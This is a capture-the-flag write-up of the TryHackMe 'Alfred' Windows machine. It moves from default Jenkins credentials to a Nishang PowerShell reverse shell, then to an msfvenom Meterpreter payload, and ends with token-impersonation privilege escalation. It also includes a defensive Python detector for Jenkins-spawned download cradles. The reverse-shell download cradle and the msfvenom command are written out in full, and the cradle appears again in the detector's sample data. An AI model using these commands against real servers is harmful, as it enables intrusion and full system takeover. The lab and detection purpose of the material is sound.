TryHackMe – Alfred Writeup
Hello and welcome to my second TryHackMe writeup. Today we are doing a Windows machine called "Alfred", part of the OSCP learning path. By doing this machine you will learn how to exploit a common misconfiguration in Jenkins to gain an initial shell, and then escalate privileges to get full system access.
Let us start off with an intense Nmap scan with no ping.
The Nmap scan shows 3 common ports open: 80, 3389 and 8080. There are two web servers running: Microsoft IIS on port 80 and Jetty 9.4 on port 8080.
Browsing to the web server on port 80, we see that it hosts a simple website with a picture of Bruce Wayne saying RIP Bruce Wayne and requesting donations. 🙂 The most interesting part is port 8080, which hosts the Jenkins app.
When I saw the picture of Bruce Wayne, I understood that the machine name Alfred refers to none other than Bruce's loyal butler, Alfred Thaddeus Crane Pennyworth. :) That's cool.
OK, coming to the point: I tried admin:***** as login credentials for the Jenkins portal and fortunately they were accepted. I was logged in to the dashboard as admin.
I tried the same credentials to access the system using an RDP client, but the credentials were not accepted.
A quick search using SearchSploit returned a number of Jenkins exploits, but none are listed for the installed Jenkins version 2.190.1.
Getting Reverse Shell As User Jenkins
Since this is a Windows machine, and as advised by THM, I'm going to use the Nishang Invoke-PowerShellTcp PowerShell script to get a reverse shell. First, we need to get the PowerShell script onto the machine. So, let us host it with the Python SimpleHTTP server from the Alfred working directory.
From the Project Config menu → Build Environment tab → Build, I can execute Windows commands.
So getting a reverse shell is easy. I used Nishang to gain initial access.
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Here is my final PowerShell command:
Once the command is ready, paste it into the command prompt and click on Save and Apply. Then click on Build Now:
As soon as you click on Build Now, you will see the hit on your Python HTTP server and the updated Build History, as in the screenshot below.
Once the build completed, my listener was activated and I had a reverse shell as alfred\bruce.
I found user.txt on Bruce's desktop.
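From the defender's side, the build step above shows up in process-creation logging as a shell started under Jenkins with a download-and-execute command line. The following Python triage is an added example, not part of the original writeup; the events are constructed, use Sysmon Event ID 1 field names, and the Jenkins install path, the jenkins*.bat temp-script name and the 192.0.2.10 address are assumptions.

```python
import re

# Assumption: Jenkins runs from a path containing "jenkins" and executes Windows
# batch build steps through a temp script named jenkins*.bat.
JENKINS = re.compile(r"jenkins", re.IGNORECASE)
SHELL = re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.IGNORECASE)
# Download-and-execute markers from the build-step command on this page.
CRADLE = re.compile(r"downloadstring|net\.webclient|\biex\b|invoke-expression",
                    re.IGNORECASE)

def classify(ev):
    """Return 'high', 'medium', 'low' or None for one process-creation event."""
    parent = ev.get("ParentImage", "") + " " + ev.get("ParentCommandLine", "")
    jenkins_shell = bool(JENKINS.search(parent) and SHELL.search(ev.get("Image", "")))
    cradle = bool(CRADLE.search(ev.get("CommandLine", "")))
    if jenkins_shell and cradle:
        return "high"      # build step pulling and running remote code
    if cradle:
        return "medium"    # cradle outside Jenkins: still worth a look
    if jenkins_shell:
        return "low"       # ordinary for batch build steps; keep for baselining
    return None

def triage(events):
    """Return (severity, Image, User) for every event that scored."""
    hits = [(classify(e), e["Image"], e.get("User", "")) for e in events]
    return [h for h in hits if h[0]]

# Constructed sample events (not taken from the target machine).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    {"User": r"alfred\bruce", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c call C:\Windows\TEMP\jenkins123.bat",
     "ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe"},
    {"User": r"alfred\bruce", "Image": PS,
     "CommandLine": "powershell iex (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10:8000/a.ps1')",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r"cmd /c call C:\Windows\TEMP\jenkins123.bat"},
    {"User": r"alfred\bruce", "Image": PS,
     "CommandLine": r"powershell Get-ChildItem C:\inetpub",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for severity, image, user in triage(SAMPLE):
        print(f"{severity:6} {user:14} {image}")
```

The "low" bucket is deliberately kept: on a build server it is the baseline against which a "high" hit stands out.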
TASK II: Switching Shells: Upgrading PS Shell to Meterpreter Shell
A Meterpreter shell is always handy: you can switch between sessions and shells, and it makes exploitation easier. So, as suggested by THM, let us upgrade the current shell to Meterpreter.
I created the Meterpreter reverse shell payload using the following command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
I set up my Metasploit multi/handler
Then, run the PowerShell download command:
And run Start-Process "nav1n.exe" to execute my payload.
And I have a proper Meterpreter shell:
Task 3: Privilege Escalation
Now that we have initial access as Alfred, let's use token impersonation to gain system access.
Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe (think of this as an authentication process).
This access token consists of:
- user SIDs (security identifiers)
- group SIDs
- privileges (ref: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
Listing Windows Tokens in Meterpreter:
As we can see, the BUILTIN\Administrators token is available, so let us use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token.
And I read the root.txt from
Thank you for reading.